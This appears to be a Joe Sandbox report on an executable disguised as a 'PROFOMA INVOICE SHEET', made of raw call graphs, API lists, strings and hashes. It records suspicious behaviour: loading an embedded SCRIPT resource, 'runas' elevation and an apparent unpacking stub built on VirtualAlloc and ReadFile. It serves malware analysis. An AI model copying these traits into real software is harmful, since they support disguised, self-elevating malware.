30aec9 22 API calls 96371->96372 96373 388cee CharLowerBuffW 96372->96373 96418 368e54 96373->96418 96377 30a961 22 API calls 96378 388d2a 96377->96378 96425 306d25 22 API calls __fread_nolock 96378->96425 96380 388d3e 96381 3093b2 22 API calls 96380->96381 96383 388d48 _wcslen 96381->96383 96382 388e5e _wcslen 96382->96317 96383->96382 96426 38851d 42 API calls _strftime 96383->96426 96385 387ea1 96384->96385 96386 387eec 96384->96386 96387 31fe0b 22 API calls 96385->96387 96390 389096 96386->96390 96388 387ec3 96387->96388 96388->96386 96389 31fddb 22 API calls 96388->96389 96389->96388 96391 3892ab ISource 96390->96391 96396 3890ba _strcat _wcslen 96390->96396 96391->96326 96392 30b38f 39 API calls 96392->96396 96393 30b567 39 API calls 96393->96396 96394 30b6b5 39 API calls 96394->96396 96395 307510 53 API calls 96395->96396 96396->96391 96396->96392 96396->96393 96396->96394 96396->96395 96397 32ea0c 21 API calls ___std_exception_copy 96396->96397 96429 36efae 24 API calls _wcslen 96396->96429 96397->96396 96401 31fc85 96399->96401 96400 31fd1d VirtualProtect 96402 31fceb 96400->96402 96401->96400 96401->96402 96402->96330 96402->96331 96403->96317 96404->96317 96405->96334 96406->96336 96407->96338 96408->96341 96409->96347 96410->96347 96411->96347 96412->96318 96413->96347 96414->96356 96415->96356 96416->96360 96417->96357 96419 368e74 _wcslen 96418->96419 96420 368f63 96419->96420 96422 368f68 96419->96422 96424 368ea9 96419->96424 96420->96377 96420->96383 96422->96420 96428 31ce60 41 API calls 96422->96428 96424->96420 96427 31ce60 41 API calls 96424->96427 96425->96380 96426->96382 96427->96424 96428->96422 96429->96396 96431 344035 96430->96431 96432 30575c CreateFileW 96430->96432 96433 30577b 96431->96433 96434 34403b CreateFileW 96431->96434 96432->96433 96433->96237 96433->96239 96434->96433 96435 344063 96434->96435 96451 3054c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96435->96451 96437 34406e 96437->96433 96438->96200 96439->96218 96440->96229 96441->96244 96442->96231 96443->96243 96444->96248 96446 36cd0e 96445->96446 96447 36cd19 WriteFile 96445->96447 96452 36cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96446->96452 96447->96246 96449->96253 96450->96253 96451->96437 96452->96447 96454 30a961 22 API calls 96453->96454 96455 3692de 96454->96455 96456 306270 22 API calls 96455->96456 96457 3692f2 96456->96457 96458 368e54 41 API calls 96457->96458 96464 369314 96457->96464 96459 36930e 96458->96459 96459->96464 96479 306d25 22 API calls __fread_nolock 96459->96479 96460 368e54 41 API calls 96460->96464 96463 3693b3 96466 30a8c7 22 API calls 96463->96466 96467 3693c2 96463->96467 96464->96460 96464->96463 96465 306350 22 API calls 96464->96465 96468 369397 96464->96468 96480 306d25 22 API calls __fread_nolock 96464->96480 96465->96464 96466->96467 96467->96290 96481 306d25 22 API calls __fread_nolock 96468->96481 96470 3693a7 96471 306350 22 API calls 96470->96471 96471->96463 96472->96271 96473->96279 96474->96286 96475->96288 96476->96274 96477->96277 96478->96288 96479->96464 96480->96464 96481->96470 96483 379902 96482->96483 96484 3799e8 96482->96484 96486 31fddb 22 API calls 96483->96486 96540 379caa 39 API calls 96484->96540 96487 379909 96486->96487 96489 31fe0b 22 API calls 96487->96489 96488 3799ca 96488->96293 96490 37991a 96489->96490 96492 306246 CloseHandle 96490->96492 96491 379ac5 96533 371e96 96491->96533 96494 379925 96492->96494 96497 30a961 22 API calls 96494->96497 96495 379acc 96503 36ccff 4 API calls 96495->96503 96496 3799a2 96496->96488 96496->96491 96499 379a33 96496->96499 96498 37992d 96497->96498 96500 306246 CloseHandle 96498->96500 96501 307510 53 API calls 96499->96501 96502 379934 96500->96502 96511 379a3a 96501->96511 96504 307510 53 API calls 96502->96504 96508 379aa8 96503->96508 96507 379940 96504->96507 96505 379abb 96542 36cd57 30 API calls 96505->96542 96509 306246 CloseHandle 96507->96509 96508->96488 96512 306246 CloseHandle 96508->96512 96513 37994a 96509->96513 96510 306270 22 API calls 96514 379a7e 96510->96514 96511->96505 96525 379a6e 96511->96525 96515 379b1e 96512->96515 96516 305745 5 API calls 96513->96516 96517 379a8e 96514->96517 96520 30a8c7 22 API calls 96514->96520 96543 306216 CloseHandle ISource 96515->96543 96519 379959 96516->96519 96521 3033c6 22 API calls 96517->96521 96522 3799c2 96519->96522 96523 37995d 96519->96523 96520->96517 96524 379a9c 96521->96524 96539 306216 CloseHandle ISource 96522->96539 96537 3053de 27 API calls ISource 96523->96537 96541 36cd57 30 API calls 96524->96541 96525->96510 96529 37996b 96538 3053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96529->96538 96531 379972 96531->96496 96532 36ccff 4 API calls 96531->96532 96532->96496 96534 371ea4 96533->96534 96535 371e9f 96533->96535 96534->96495 96544 370f67 24 API calls __fread_nolock 96535->96544 96537->96529 96538->96531 96539->96488 96540->96496 96541->96508 96542->96508 96543->96488 96544->96534 96545 30ddc0 96548 30aa19 96545->96548 96547 30ddcc 96549 30aa3a 96548->96549 96550 30aa8f 96548->96550 96549->96550 96551 30ec40 207 API calls 96549->96551 96555 30aabe 96550->96555 96558 37359c 82 API calls __wsopen_s 96550->96558 96553 30aa6b 96551->96553 96553->96555 96557 30aceb 23 API calls ISource 96553->96557 96554 34f907 96554->96554 96555->96547 96557->96550 96558->96554 96559 338402 96564 3381be 96559->96564 96562 33842a 96569 3381ef try_get_first_available_module 96564->96569 96566 3383ee 96583 3327ec 26 API calls _abort 96566->96583 96568 338343 96568->96562 96576 340984 96568->96576 96572 338338 96569->96572 96579 328e0b 40 API calls 2 library calls 96569->96579 96571 33838c 96571->96572 96580 328e0b 40 API calls 2 library calls 96571->96580 96572->96568 96582 32f2d9 20 API calls _abort 96572->96582 96574 3383ab 96574->96572 96581 328e0b 40 API calls 2 library calls 96574->96581 96584 340081 96576->96584 96578 34099f 96578->96562 96579->96571 96580->96574 96581->96572 96582->96566 96583->96568 96587 34008d CallCatchBlock 96584->96587 96585 34009b 96641 32f2d9 20 API calls _abort 96585->96641 96587->96585 96588 3400d4 96587->96588 96595 34065b 96588->96595 96589 3400a0 96642 3327ec 26 API calls _abort 96589->96642 96594 3400aa __fread_nolock 96594->96578 96596 340678 96595->96596 96597 3406a6 96596->96597 96598 34068d 96596->96598 96644 335221 96597->96644 96658 32f2c6 20 API calls _abort 96598->96658 96601 3406ab 96602 3406b4 96601->96602 96603 3406cb 96601->96603 96660 32f2c6 20 API calls _abort 96602->96660 96657 34039a CreateFileW 96603->96657 96604 340692 96659 32f2d9 20 API calls _abort 96604->96659 96608 3406b9 96661 32f2d9 20 API calls _abort 96608->96661 96609 3400f8 96643 340121 LeaveCriticalSection __wsopen_s 96609->96643 96611 340781 GetFileType 96612 3407d3 96611->96612 96613 34078c GetLastError 96611->96613 96666 33516a 21 API calls 3 library calls 96612->96666 96664 32f2a3 20 API calls 2 library calls 96613->96664 96614 340756 GetLastError 96663 32f2a3 20 API calls 2 library calls 96614->96663 96616 340704 96616->96611 96616->96614 96662 34039a CreateFileW 96616->96662 96618 34079a CloseHandle 96618->96604 96620 3407c3 96618->96620 96665 32f2d9 20 API calls _abort 96620->96665 96622 340749 96622->96611 96622->96614 96624 3407f4 96626 340840 96624->96626 96667 3405ab 72 API calls 4 library calls 96624->96667 96625 3407c8 96625->96604 96630 34086d 96626->96630 96668 34014d 72 API calls 4 library calls 96626->96668 96629 340866 96629->96630 96631 34087e 96629->96631 96632 3386ae __wsopen_s 29 API calls 96630->96632 96631->96609 96633 3408fc CloseHandle 96631->96633 96632->96609 96669 34039a CreateFileW 96633->96669 96635 340927 96636 340931 GetLastError 96635->96636 96637 34095d 96635->96637 96670 32f2a3 20 API calls 2 library calls 96636->96670 96637->96609 96639 34093d 96671 335333 21 API calls 3 library calls 96639->96671 96641->96589 96642->96594 96643->96594 96645 33522d CallCatchBlock 96644->96645 96672 332f5e EnterCriticalSection 96645->96672 96647 335234 96649 335259 96647->96649 96652 3352c7 EnterCriticalSection 96647->96652 96654 33527b 96647->96654 96651 335000 __wsopen_s 21 API calls 96649->96651 96650 3352a4 __fread_nolock 96650->96601 96653 33525e 96651->96653 96652->96654 96655 3352d4 LeaveCriticalSection 96652->96655 96653->96654 96676 335147 EnterCriticalSection 96653->96676 96673 33532a 96654->96673 96655->96647 96657->96616 96658->96604 96659->96609 96660->96608 96661->96604 96662->96622 96663->96604 96664->96618 96665->96625 96666->96624 96667->96626 96668->96629 96669->96635 96670->96639 96671->96637 96672->96647 96677 332fa6 LeaveCriticalSection 96673->96677 96675 335331 96675->96650 96676->96654 96677->96675 96678 342ba5 96679 302b25 96678->96679 96680 342baf 96678->96680 96706 302b83 7 API calls 96679->96706 96681 303a5a 24 API calls 96680->96681 96684 342bb8 96681->96684 96686 309cb3 22 API calls 96684->96686 96688 342bc6 96686->96688 96687 302b2f 96693 303837 49 API calls 96687->96693 96694 302b44 96687->96694 96689 342bf5 96688->96689 96690 342bce 96688->96690 96692 3033c6 22 API calls 96689->96692 96691 3033c6 22 API calls 96690->96691 96695 342bd9 96691->96695 96696 342bf1 GetForegroundWindow ShellExecuteW 96692->96696 96693->96694 96697 302b5f 96694->96697 96710 3030f2 Shell_NotifyIconW ___scrt_fastfail 96694->96710 96698 306350 22 API calls 96695->96698 96700 342c26 96696->96700 96703 302b66 SetCurrentDirectoryW 96697->96703 96702 342be7 96698->96702 96700->96697 96704 3033c6 22 API calls 96702->96704 96705 302b7a 96703->96705 96704->96696 96711 302cd4 7 API calls 96706->96711 96708 302b2a 96709 302c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96708->96709 96709->96687 96710->96697 96711->96708 96712 302de3 96713 302df0 __wsopen_s 96712->96713 96714 302e09 96713->96714 96715 342c2b ___scrt_fastfail 96713->96715 96716 303aa2 23 API calls 96714->96716 96717 342c47 GetOpenFileNameW 96715->96717 96718 302e12 96716->96718 96720 342c96 96717->96720 96728 302da5 96718->96728 96722 306b57 22 API calls 96720->96722 96724 342cab 96722->96724 96724->96724 96725 302e27 96746 3044a8 96725->96746 96729 341f50 __wsopen_s 96728->96729 96730 302db2 GetLongPathNameW 96729->96730 96731 306b57 22 API calls 96730->96731 96732 302dda 96731->96732 96733 303598 96732->96733 96734 30a961 22 API calls 96733->96734 96735 3035aa 96734->96735 96736 303aa2 23 API calls 96735->96736 96737 3035b5 96736->96737 96738 3035c0 96737->96738 96743 3432eb 96737->96743 96739 30515f 22 API calls 96738->96739 96741 3035cc 96739->96741 96776 3035f3 96741->96776 96744 34330d 96743->96744 96782 31ce60 41 API calls 96743->96782 96745 3035df 96745->96725 96747 304ecb 94 API calls 96746->96747 96748 3044cd 96747->96748 96749 343833 96748->96749 96750 304ecb 94 API calls 96748->96750 96751 372cf9 80 API calls 96749->96751 96753 3044e1 96750->96753 96752 343848 96751->96752 96754 34384c 96752->96754 96755 343869 96752->96755 96753->96749 96756 3044e9 96753->96756 96757 304f39 68 API calls 96754->96757 96758 31fe0b 22 API calls 96755->96758 96759 343854 96756->96759 96760 3044f5 96756->96760 96757->96759 96767 3438ae 96758->96767 96807 36da5a 82 API calls 96759->96807 96806 30940c 136 API calls 2 library calls 96760->96806 96763 343862 96763->96755 96764 302e31 96765 343a5f 96771 343a67 96765->96771 96766 304f39 68 API calls 96766->96771 96767->96765 96767->96771 96773 309cb3 22 API calls 96767->96773 96783 36967e 96767->96783 96786 370b5a 96767->96786 96792 30a4a1 96767->96792 96800 303ff7 96767->96800 96808 3695ad 42 API calls _wcslen 96767->96808 96771->96766 96809 36989b 82 API calls __wsopen_s 96771->96809 96773->96767 96777 303605 96776->96777 96781 303624 __fread_nolock 96776->96781 96779 31fe0b 22 API calls 96777->96779 96778 31fddb 22 API calls 96780 30363b 96778->96780 96779->96781 96780->96745 96781->96778 96782->96743 96784 31fe0b 22 API calls 96783->96784 96785 3696ae __fread_nolock 96784->96785 96785->96767 96785->96785 96787 370b65 96786->96787 96788 31fddb 22 API calls 96787->96788 96789 370b7c 96788->96789 96790 309cb3 22 API calls 96789->96790 96791 370b87 96790->96791 96791->96767 96793 30a52b 96792->96793 96799 30a4b1 __fread_nolock 96792->96799 96795 31fe0b 22 API calls 96793->96795 96794 31fddb 22 API calls 96796 30a4b8 96794->96796 96795->96799 96797 31fddb 22 API calls 96796->96797 96798 30a4d6 96796->96798 96797->96798 96798->96767 96799->96794 96801 30400a 96800->96801 96803 3040ae 96800->96803 96802 31fe0b 22 API calls 96801->96802 96805 30403c 96801->96805 96802->96805 96803->96767 96804 31fddb 22 API calls 96804->96805 96805->96803 96805->96804 96806->96764 96807->96763 96808->96767 96809->96771 96810 353a41 96814 3710c0 96810->96814 96812 353a4c 96813 3710c0 53 API calls 96812->96813 96813->96812 96815 3710fa 96814->96815 96819 3710cd 96814->96819 96815->96812 96816 3710fc 96826 31fa11 53 API calls 96816->96826 96817 371101 96820 307510 53 API calls 96817->96820 96819->96815 96819->96816 96819->96817 96823 3710f4 96819->96823 96821 371108 96820->96821 96822 306350 22 API calls 96821->96822 96822->96815 96825 30b270 39 API calls 96823->96825 96825->96815 96826->96817 96827 301044 96832 3010f3 96827->96832 96829 30104a 96868 3200a3 29 API calls __onexit 96829->96868 96831 301054 96869 301398 96832->96869 96836 30116a 96837 30a961 22 API calls 96836->96837 96838 301174 96837->96838 96839 30a961 22 API calls 96838->96839 96840 30117e 96839->96840 96841 30a961 22 API calls 96840->96841 96842 301188 96841->96842 96843 30a961 22 API calls 96842->96843 96844 3011c6 96843->96844 96845 30a961 22 API calls 96844->96845 96846 301292 96845->96846 96879 30171c 96846->96879 96850 3012c4 96851 30a961 22 API calls 96850->96851 96852 3012ce 96851->96852 96853 311940 9 API calls 96852->96853 96854 3012f9 96853->96854 96900 301aab 96854->96900 96856 301315 96857 301325 GetStdHandle 96856->96857 96858 342485 96857->96858 96859 30137a 96857->96859 96858->96859 96860 34248e 96858->96860 96862 301387 OleInitialize 96859->96862 96861 31fddb 22 API calls 96860->96861 96863 342495 96861->96863 96862->96829 96907 37011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96863->96907 96865 34249e 96908 370944 CreateThread 96865->96908 96867 3424aa CloseHandle 96867->96859 96868->96831 96909 3013f1 96869->96909 96872 3013f1 22 API calls 96873 3013d0 96872->96873 96874 30a961 22 API calls 96873->96874 96875 3013dc 96874->96875 96876 306b57 22 API calls 96875->96876 96877 301129 96876->96877 96878 301bc3 6 API calls 96877->96878 96878->96836 96880 30a961 22 API calls 96879->96880 96881 30172c 96880->96881 96882 30a961 22 API calls 96881->96882 96883 301734 96882->96883 96884 30a961 22 API calls 96883->96884 96885 30174f 96884->96885 96886 31fddb 22 API calls 96885->96886 96887 30129c 96886->96887 96888 301b4a 96887->96888 96889 301b58 96888->96889 96890 30a961 22 API calls 96889->96890 96891 301b63 96890->96891 96892 30a961 22 API calls 96891->96892 96893 301b6e 96892->96893 96894 30a961 22 API calls 96893->96894 96895 301b79 96894->96895 96896 30a961 22 API calls 96895->96896 96897 301b84 96896->96897 96898 31fddb 22 API calls 96897->96898 96899 301b96 RegisterWindowMessageW 96898->96899 96899->96850 96901 34272d 96900->96901 96902 301abb 96900->96902 96916 373209 23 API calls 96901->96916 96903 31fddb 22 API calls 96902->96903 96905 301ac3 96903->96905 96905->96856 96906 342738 96907->96865 96908->96867 96917 37092a 28 API calls 96908->96917 96910 30a961 22 API calls 96909->96910 96911 3013fc 96910->96911 96912 30a961 22 API calls 96911->96912 96913 301404 96912->96913 96914 30a961 22 API calls 96913->96914 96915 3013c6 96914->96915 96915->96872 96916->96906 96918 352a00 96932 30d7b0 ISource 96918->96932 96919 30db11 PeekMessageW 96919->96932 96920 30d807 GetInputState 96920->96919 96920->96932 96922 351cbe TranslateAcceleratorW 96922->96932 96923 30da04 timeGetTime 96923->96932 96924 30db73 TranslateMessage DispatchMessageW 96925 30db8f PeekMessageW 96924->96925 96925->96932 96926 30dbaf Sleep 96943 30dbc0 96926->96943 96927 352b74 Sleep 96927->96943 96928 31e551 timeGetTime 96928->96943 96929 351dda timeGetTime 96981 31e300 23 API calls 96929->96981 96932->96919 96932->96920 96932->96922 96932->96923 96932->96924 96932->96925 96932->96926 96932->96927 96932->96929 96935 30d9d5 96932->96935 96946 30ec40 207 API calls 96932->96946 96947 311310 207 API calls 96932->96947 96948 30bf40 207 API calls 96932->96948 96950 30dd50 96932->96950 96957 30dfd0 96932->96957 96980 31edf6 IsDialogMessageW GetClassLongW 96932->96980 96982 373a2a 23 API calls 96932->96982 96983 37359c 82 API calls __wsopen_s 96932->96983 96933 352c0b GetExitCodeProcess 96938 352c37 CloseHandle 96933->96938 96939 352c21 WaitForSingleObject 96933->96939 96934 352a31 96934->96935 96936 3929bf GetForegroundWindow 96936->96943 96938->96943 96939->96932 96939->96938 96940 352ca9 Sleep 96940->96932 96943->96928 96943->96932 96943->96933 96943->96934 96943->96935 96943->96936 96943->96940 96984 385658 23 API calls 96943->96984 96985 36e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96943->96985 96986 36d4dc 47 API calls 96943->96986 96946->96932 96947->96932 96948->96932 96951 30dd83 96950->96951 96952 30dd6f 96950->96952 96988 37359c 82 API calls __wsopen_s 96951->96988 96987 30d260 207 API calls 2 library calls 96952->96987 96954 30dd7a 96954->96932 96956 352f75 96956->96956 96960 30e010 96957->96960 96977 30e0dc ISource 96960->96977 96991 320242 5 API calls __Init_thread_wait 96960->96991 96961 352fca 96963 30a961 22 API calls 96961->96963 96961->96977 96962 30a961 22 API calls 96962->96977 96966 352fe4 96963->96966 96992 3200a3 29 API calls __onexit 96966->96992 96968 352fee 96993 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96968->96993 96971 30ec40 207 API calls 96971->96977 96972 37359c 82 API calls 96972->96977 96974 30a8c7 22 API calls 96974->96977 96975 30e3e1 96975->96932 96976 3104f0 22 API calls 96976->96977 96977->96962 96977->96971 96977->96972 96977->96974 96977->96975 96977->96976 96989 30a81b 41 API calls 96977->96989 96990 31a308 207 API calls 96977->96990 96994 320242 5 API calls __Init_thread_wait 96977->96994 96995 3200a3 29 API calls __onexit 96977->96995 96996 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96977->96996 96997 3847d4 207 API calls 96977->96997 96998 3868c1 207 API calls 96977->96998 96980->96932 96981->96932 96982->96932 96983->96932 96984->96943 96985->96943 96986->96943 96987->96954 96988->96956 96989->96977 96990->96977 96991->96961 96992->96968 96993->96977 96994->96977 96995->96977 96996->96977 96997->96977 96998->96977 96999 30dee5 97002 30b710 96999->97002 97003 30b72b 97002->97003 97004 350146 97003->97004 97005 3500f8 97003->97005 97031 30b750 97003->97031 97044 3858a2 207 API calls 2 library calls 97004->97044 97008 350102 97005->97008 97011 35010f 97005->97011 97005->97031 97042 385d33 207 API calls 97008->97042 97028 30ba20 97011->97028 97043 3861d0 207 API calls 2 library calls 97011->97043 97014 3503d9 97014->97014 97018 350322 97047 385c0c 82 API calls 97018->97047 97022 30ba4e 97026 31d336 40 API calls 97026->97031 97027 30bbe0 40 API calls 97027->97031 97028->97022 97048 37359c 82 API calls __wsopen_s 97028->97048 97029 30ec40 207 API calls 97029->97031 97030 30a8c7 22 API calls 97030->97031 97031->97018 97031->97022 97031->97026 97031->97027 97031->97028 97031->97029 97031->97030 97033 30a81b 41 API calls 97031->97033 97034 31d2f0 40 API calls 97031->97034 97035 31a01b 207 API calls 97031->97035 97036 320242 5 API calls __Init_thread_wait 97031->97036 97037 31edcd 22 API calls 97031->97037 97038 3200a3 29 API calls __onexit 97031->97038 97039 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97031->97039 97040 31ee53 82 API calls 97031->97040 97041 31e5ca 207 API calls 97031->97041 97045 30aceb 23 API calls ISource 97031->97045 97046 35f6bf 23 API calls 97031->97046 97033->97031 97034->97031 97035->97031 97036->97031 97037->97031 97038->97031 97039->97031 97040->97031 97041->97031 97042->97011 97043->97028 97044->97031 97045->97031 97046->97031 97047->97028 97048->97014 97049 3dbb820 97063 3db9470 97049->97063 97051 3dbb8e1 97066 3dbb710 97051->97066 97053 3dbb90a CreateFileW 97055 3dbb959 97053->97055 97056 3dbb95e 97053->97056 97056->97055 97057 3dbb975 VirtualAlloc 97056->97057 97057->97055 97058 3dbb993 ReadFile 97057->97058 97058->97055 97059 3dbb9ae 97058->97059 97060 3dba710 13 API calls 97059->97060 97061 3dbb9e1 97060->97061 97062 3dbba04 ExitProcess 97061->97062 97062->97055 97069 3dbc910 GetPEB 97063->97069 97065 3db9afb 97065->97051 97067 3dbb719 Sleep 97066->97067 97068 3dbb727 97067->97068 97070 3dbc93a 97069->97070 97070->97065 97071 301cad SystemParametersInfoW

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 234 3042de-30434d call 30a961 GetVersionExW call 306b57 239 343617-34362a 234->239 240 304353 234->240 241 34362b-34362f 239->241 242 304355-304357 240->242 245 343631 241->245 246 343632-34363e 241->246 243 343656 242->243 244 30435d-3043bc call 3093b2 call 3037a0 242->244 249 34365d-343660 243->249 262 3043c2-3043c4 244->262 263 3437df-3437e6 244->263 245->246 246->241 248 343640-343642 246->248 248->242 251 343648-34364f 248->251 252 343666-3436a8 249->252 253 30441b-304435 GetCurrentProcess IsWow64Process 249->253 251->239 255 343651 251->255 252->253 256 3436ae-3436b1 252->256 258 304494-30449a 253->258 259 304437 253->259 255->243 260 3436b3-3436bd 256->260 261 3436db-3436e5 256->261 264 30443d-304449 258->264 259->264 265 3436bf-3436c5 260->265 266 3436ca-3436d6 260->266 268 3436e7-3436f3 261->268 269 3436f8-343702 261->269 262->249 267 3043ca-3043dd 262->267 270 343806-343809 263->270 271 3437e8 263->271 272 343824-343828 GetSystemInfo 264->272 273 30444f-30445e LoadLibraryA 264->273 265->253 266->253 274 343726-34372f 267->274 275 3043e3-3043e5 267->275 268->253 277 343704-343710 269->277 278 343715-343721 269->278 279 3437f4-3437fc 270->279 280 34380b-34381a 270->280 276 3437ee 271->276 281 304460-30446e GetProcAddress 273->281 282 30449c-3044a6 GetSystemInfo 273->282 287 343731-343737 274->287 288 34373c-343748 274->288 285 34374d-343762 275->285 286 3043eb-3043ee 275->286 276->279 277->253 278->253 279->270 280->276 289 34381c-343822 280->289 281->282 283 304470-304474 GetNativeSystemInfo 281->283 284 304476-304478 282->284 283->284 290 304481-304493 284->290 291 30447a-30447b FreeLibrary 284->291 294 343764-34376a 285->294 295 34376f-34377b 285->295 292 3043f4-30440f 286->292 293 343791-343794 286->293 287->253 288->253 289->279 291->290 297 343780-34378c 292->297 298 304415 292->298 293->253 296 34379a-3437c1 293->296 294->253 295->253 299 3437c3-3437c9 296->299 300 3437ce-3437da 296->300 297->253 298->253 299->253 300->253
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0030430D
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • GetCurrentProcess.KERNEL32(?,0039CB64,00000000,?,?), ref: 00304422
                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00304429
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00304454
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00304466
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00304474
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0030447B
                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 003044A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                    • API String ID: 3290436268-3101561225
                                    • Opcode ID: 20dab3c4e4a7592bb4b1d5febc87d0461299af23feb330dc254b865c5905fc98
                                    • Instruction ID: 9f79fccb25e1cd2ca05e861d8f17e7152ab6706b9e6b5dad83ea34139019f6ed
                                    • Opcode Fuzzy Hash: 20dab3c4e4a7592bb4b1d5febc87d0461299af23feb330dc254b865c5905fc98
                                    • Instruction Fuzzy Hash: 05A186ADA1B2C0FFC713C76EBC811957FEDBB26340F19549BE18197A62D2345A04CB25

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1270 3042a2-3042ba CreateStreamOnHGlobal 1271 3042da-3042dd 1270->1271 1272 3042bc-3042d3 FindResourceExW 1270->1272 1273 3042d9 1272->1273 1274 3435ba-3435c9 LoadResource 1272->1274 1273->1271 1274->1273 1275 3435cf-3435dd SizeofResource 1274->1275 1275->1273 1276 3435e3-3435ee LockResource 1275->1276 1276->1273 1277 3435f4-3435fc 1276->1277 1278 343600-343612 1277->1278 1278->1273
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003050AA,?,?,00000000,00000000), ref: 003042B2
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003050AA,?,?,00000000,00000000), ref: 003042C9
                                    • LoadResource.KERNEL32(?,00000000,?,?,003050AA,?,?,00000000,00000000,?,?,?,?,?,?,00304F20), ref: 003435BE
                                    • SizeofResource.KERNEL32(?,00000000,?,?,003050AA,?,?,00000000,00000000,?,?,?,?,?,?,00304F20), ref: 003435D3
                                    • LockResource.KERNEL32(003050AA,?,?,003050AA,?,?,00000000,00000000,?,?,?,?,?,?,00304F20,?), ref: 003435E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 69c8dd67e94da93d2d47366b2d9051d0f144f09930bb37fc0239947bd5b00d35
                                    • Instruction ID: 7cc1b8ea17f35450bbc447ed3a65394a4b5347e1b95b6d77c7b3d8d96cadeee7
                                    • Opcode Fuzzy Hash: 69c8dd67e94da93d2d47366b2d9051d0f144f09930bb37fc0239947bd5b00d35
                                    • Instruction Fuzzy Hash: 54117CB0201701BFDB228B65DC48F677BBDEBC5B51F10496AF502D6290DB72E900C630

                                    Control-flow Graph

                                    APIs
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00302B6B
                                      • Part of subcall function 00303A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003D1418,?,00302E7F,?,?,?,00000000), ref: 00303A78
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,003C2224), ref: 00342C10
                                    • ShellExecuteW.SHELL32(00000000,?,?,003C2224), ref: 00342C17
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                    • String ID: runas
                                    • API String ID: 448630720-4000483414
                                    • Opcode ID: 5c8674f47c48dd93cf52e68fe348f6b696f292985c3caeea7604ee1df0550e67
                                    • Instruction ID: 5d97d0728f9cbbcef2945227e851e4958a23b9f10ed2bdca779e02bf4e96d41d
                                    • Opcode Fuzzy Hash: 5c8674f47c48dd93cf52e68fe348f6b696f292985c3caeea7604ee1df0550e67
